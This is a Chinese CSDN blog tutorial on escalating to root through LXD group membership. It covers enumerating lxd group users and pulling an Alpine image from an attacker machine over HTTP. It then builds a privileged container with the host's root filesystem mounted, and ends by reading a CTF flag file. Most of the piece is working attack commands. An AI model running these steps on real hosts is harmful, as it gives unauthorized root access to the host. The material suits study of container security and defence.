linux提权大全3(lxc容器提权)

于 2024-09-09 20:50:23 发布
阅读量515 收藏 10
点赞数 16
文章标签: linux 运维 服务器 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anddddoooo/article/details/142068882
版权
什么是lxc(Linux Containers)和lxd(Linux Container Daemon)
wiki:
Linux 容器( LXC ) 是一种操作系统级虚拟化方法,用于使用单个 Linux 内核在控制主机上 运行多个隔离的Linux系统(容器)。
Linux内核提供了cgroups功能,允许对资源(CPU、内存、块 I/O、网络等)进行限制和优先排序,而无需启动任何虚拟机,还提供了命名空间隔离功能,允许完全隔离应用程序对操作环境的视图,包括进程树、网络、用户 ID和已挂载的 文件系统。
LXC 结合了内核的 cgroups 和对隔离命名空间的支持,为应用程序提供隔离的环境。
注:cgroups(控制组 (control groups ) 的缩写)是Linux 内核的一个功能,可以限制、核算和隔离一组进程的资源使用情况(CPU、内存、磁盘 I/O 等)
​
chatgpt:
LXC (Linux Containers) 是一种用于 Linux 的轻量级虚拟化技术,利用 Linux 内核的 cgroups 和 namespaces 特性来实现进程级隔离。它让你可以运行一个与主机系统隔离的操作系统环境,类似于虚拟机,但比传统虚拟化技术更加轻量,因为容器共享主机的 Linux 内核。
LXC 实质上提供了一个封闭的用户空间进程环境,这意味着每个容器可以拥有自己的文件系统、进程、网络等,而不需要独立的操作系统内核。
所有的 LXC 容器都共享主机的 Linux 内核,但它们可以在用户空间运行与主机系统不同的 Linux 发行版。
​
LXD 是一种用于 Linux 操作系统上的容器管理系统,它主要用于管理 Linux 容器(LXC)。LXD 是 LXC 的一个扩展,它提供了更高级的功能。LXD 组(通常为 lxd 组)允许用户在无需 root 权限的情况下,管理 LXD 容器。
什么是alpine
Alpine Linux 是一个轻量级的 Linux 发行版。
信息收集
cat /etc/passwd | awk -F ':' '{print $1}' | xargs -L1 id | grep -i "lx"
显示所有用户所属组,如果用户所属于lxd组,就可以利用此用户进行容器提权
​
lxd的蛛丝马迹
cat /etc/passwd | grep "lxd":用于查看是否有关于lxd用户或组的信息
ps -ef | grep -i "lxd\|lxc":用于检查是否有lxd、lxc相关的运行中进程
这只是寻找服务器运行lxd的相关信息,并不是我们提权的必要条件,必要条件就是寻找一个lxd组的用户,利用这个用户我们可以构造配置错误的容器
alpine下载
攻击机器下载,下载后解压
git clone https://github.com/saghul/lxd-alpine-builder
unzip lxd-alpine-builder-master.zip
​
得到文件:alpine-v3.13-x86_64-20210218_0139.tar.gz
alpine上传
攻击机:python3 -m http.server
python
靶机:
wget http://192.168.227.47:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
alpine导入
lxc image import alpine-v3.16-x86_64-20221112_0508.tar.gz --alias alpine  # 用于将本地的镜像文件导入到 LXD 的镜像库中,并设置别名为alpine
lxc image list  # 列出当前 LXD 中所有可用的镜像
lxd init        # 初始化 LXD。这个命令会启动 LXD 的配置向导,帮助您设置 LXD 的基础配置,比如存储池、网络、镜像存储位置等,接下来进入init交互界面全都选默认即可,选完后执行下一个命令
lxc init alpine alpinect -c security.privileged=true # 根据alpine镜像创建alpinect容器,并设置容器处于特权模式(进程将会以root权限进行)
lxc config device add alpinect pwndisk disk source=/ path=/mnt/root recursive=true # 向容器添加设备,向我们新建立的alpinect容器添加以pwndisk为名的磁盘类型的设备,并将文件系统的根目录/下的所有目录挂载到磁盘设备的/mnt/root路径
lxc start alpinect  # 启动这个容器
lxc exec alpinect /bin/sh   # 在容器中执行命令开启一个会话
效果

整个linux文件系统挂载在容器/mnt/root文件夹下,在容器中从这里可以访问物理机的所有文件
​
cat /mnt/root/root/root.txt
0d2c6222bfdd3701e0fa12a9a9dc9c8c
访问成功
anddddoooo
关注
  • 16
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux lxc 容器 原理,LXCLinux Containers)安装及使用
weixin_30941215的博客
05-14 1220
下面的步骤均在Ubuntu 12.04上执行。安装想在Ubuntu上使用LXC,就要安装LXC用户空间工具,如下所示。$ sudo apt-get install lxc安装完毕之后,运行lxc-checkconifg工具,检查当前Linux内核支持LXC的情况。要是一切都已被启用,内核对LXC的支持已准备就绪。$ lxc-checkconfig 安装LXC工具后,你会发现,LXC的默认网桥接口(...
vagrant-lxc-k8s:使用Linux容器在本地运行多节点Kubernetes
02-06
【vagrant-lxc-k8s:使用Linux容器在本地运行多节点Kubernetes】 在现代软件开发环境中,容器化和 Kubernetes(K8s)已经成为管理和部署应用程序的标准方式。Vagrant 和 LXCLinux Containers)则是两种工具,分别...
linux~Docker容器提权
@小张小张的博客
11-06 4871
Docker容器的特点: 1.轻量级 在机器上运行的Docker容器共享该机器的操作系统内核; 他们使用更少的计算和内存。图像由文件系统层构建并共享公用文件。最大限度地减少了磁盘使用量。 2.标准 Docker容器基于开放标准,可在Linux发行版,Microsoft Windows以及任何基础架构(包括虚拟机,裸机)上运行。 3.安全 Docker容器将应用程序彼此隔离并从底层基础架构中分离出来。提供了最强大的默认隔离功能,可以将应用程序问题限制在一个容器中,而不是整个机器上。 关于docker提权
Linux提权辅助工具
LuckySec
04-24 4249
0x01 LinEnum 工具介绍 LinEnum 是一个高级 Bash 脚本,它从目标系统中提取了大量有用的信息,可以复制文件并进行导出,同时可以搜索包含关键字的文件。 项目地址:https://github.com/rebootuser/LinEnum LinEnum 执行的检查/任务的高级摘要: 内核和发行版详细信息 系统信息: 主机名 网络详情 当前IP 默认路由详情 DNS 服务器信息 用户信息: 当前用户详细信息 最后登录的用户
linux 提权总结
weixin_51681694的博客
06-13 7548
会继续补充.....
LXC容器
dally2的博客
03-19 893
服务器关机重启后,gpu需重新挂载到LXC
Linux 容器 (LXC) 介绍
热门推荐
allway2的博客
01-03 1万+
自云计算兴起以来,微服务一直在稳步流行。亚马逊和 Netflix 等公司正在使用云平台来提供他们最需要的服务。容器是此类云原生应用程序的核心。容器是一个隔离的环境,可促进微服务并提供卓越的扩展性和快速部署等优势。传统的基于管理程序的虚拟机(如 VMware)与操作系统级虚拟化服务(如 Docker 和 Linux 容器 (LXC))之间存在巨大差异。在本指南中,我们将为读者提供 LXC 的应用知识,LXC 是一个强大的 Linux 系统级虚拟化工具。 掌握 Linux 容器的多合一指南 如果您是一名Li
linux 提权总结_linux提权(1)
2401_83946509的博客
04-26 910
那就可以全局搜索一下某些运维程序/文件是否有suid(root属主)权限,如果有的话,可以查看文件看看调用了哪些命令,然后就可以在环境变量里面做些手脚提权lxc init来初始化image(可以填别名,也可以填指纹),也就是alpine系统,并创建test账户,通过c参数来配置安全提升策略为true,代表用户test可申请高级权限。如果碰到sudoers文件使用黑名单的情况,比如说权限禁用sudo使用find命令,但是都是在ALL基础上设置的,那么可以cp把find复制到其它目录运行。
关于Linux环境下的LXD及Docker提权
qq_46081990的博客
03-22 1756
Docker是一个开源的容器化平台,它建立在LXC之上,并提供了一套更高级别的工具和API,使得容器的构建、分发和运行变得更加简单。LXD主要面向系统级容器,可以运行完整的操作系统镜像,并提供类似于虚拟机的环境。上述提权方案只是对宿主机目录有了操作权限,如果此时反弹 shell 得到的权限将是容器内的 root 权限,而非宿主机的 root 权限,显然不是我们想要的。拉取镜像,创建容器,将宿主机的根目录 "/" 挂载到容器中的 "/mnt" 目录,进入 /mnt/root 目录查看便可得到 flag`
lxd&lxc Group提权
hirak0的博客
04-13 615
lxd和lxc Linux Container(LXC)通常被认为是一种轻量级虚拟化技术,它介于Chroot和完整开发的虚拟机之间,LXC可以创建一个跟正常Linux操作系统十分接近的环境,但是不需要使用到单独的内核资源。 Linux Daemon(LXD)是一个轻量级容器管理程序,而LXD是基于LXC容器技术实现的,而这种技术之前Docker也使用过。LXD使用了稳定的LXC API来完成所有的后台容器管理工作,并且增加了REST API支持,更进一步地提升了用户体验度。 lxd/lxc Group -
lxcLXC-Linux容器
02-02
LXC是著名且经过严格测试的低级Linux容器运行时。 自2008年以来,它一直在积极开发中,并已在全球关键生产环境中证明了自己。 它的一些核心贡献者是帮助实现Linux内核内部各种众所周知的容器化功能的人。 状态 类型...
lxc-desktop:具有Linux容器的单台计算机上的多个桌面环境
04-29
带有LXC的多个桌面环境 该存储库包含一个Debian源软件包,您可以在主机上构建和安装该软件包,以使在单个主机上并行运行带有图形桌面环境的多个LXC实例变得简单。 每个LXC实例将占用一个单独的虚拟终端(VT),因此...
掌握 Linux 命令的艺术:深入解析与实用指南
hacker__的博客
09-06 1418
Linux操作系统是和windows操作系统是并列的关系。只不过只是两个操作系统的特性各有不同而已。
Linux 进程控制
2302_77289177的博客
09-08 1163
Linux 进程控制
高效诊断Linux性能问题
Tiger93的博客
09-08 468
诊断Linux性能问题
Linux> 基础IO
prodigy623的博客
09-06 1023
详解Linux基础IO:文件系统调用接口与C库文件函数的关系、重定向、数据缓冲区、文件系统、动静态库
Linux之MySQL主从复制
最新发布
2302_79087378的博客
09-08 1402
MySQL的主从复制()是一种数据复制解决方案,将主数据库的DDL(数据定义语言)和DML(数据操纵语言)操作通过二进制日志传到从库服务器中,然后在从库上对这些日志重新执行(也叫重做),从而是的从库和主库的数据保存同步。MySQL支持将数据从一个MySQL服务器(主服务器)复制到一个或多个其他MySQL服务器(从服务器),从库同时也可以作为其他从服务器的主库,实现链状复制。MySQL主从复制的优点主要包含以下三个方面:主库出现问题,可以快速切换到从库提供服务;实现读写分离,降低主库的访问压力;
Linux修行路】线程安全和死锁
m0_68662723的博客
09-06 1380
今天的分享到这里就结束啦!如果觉得文章还不错的话,可以三连支持一下,您的支持就是我前进的动力!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值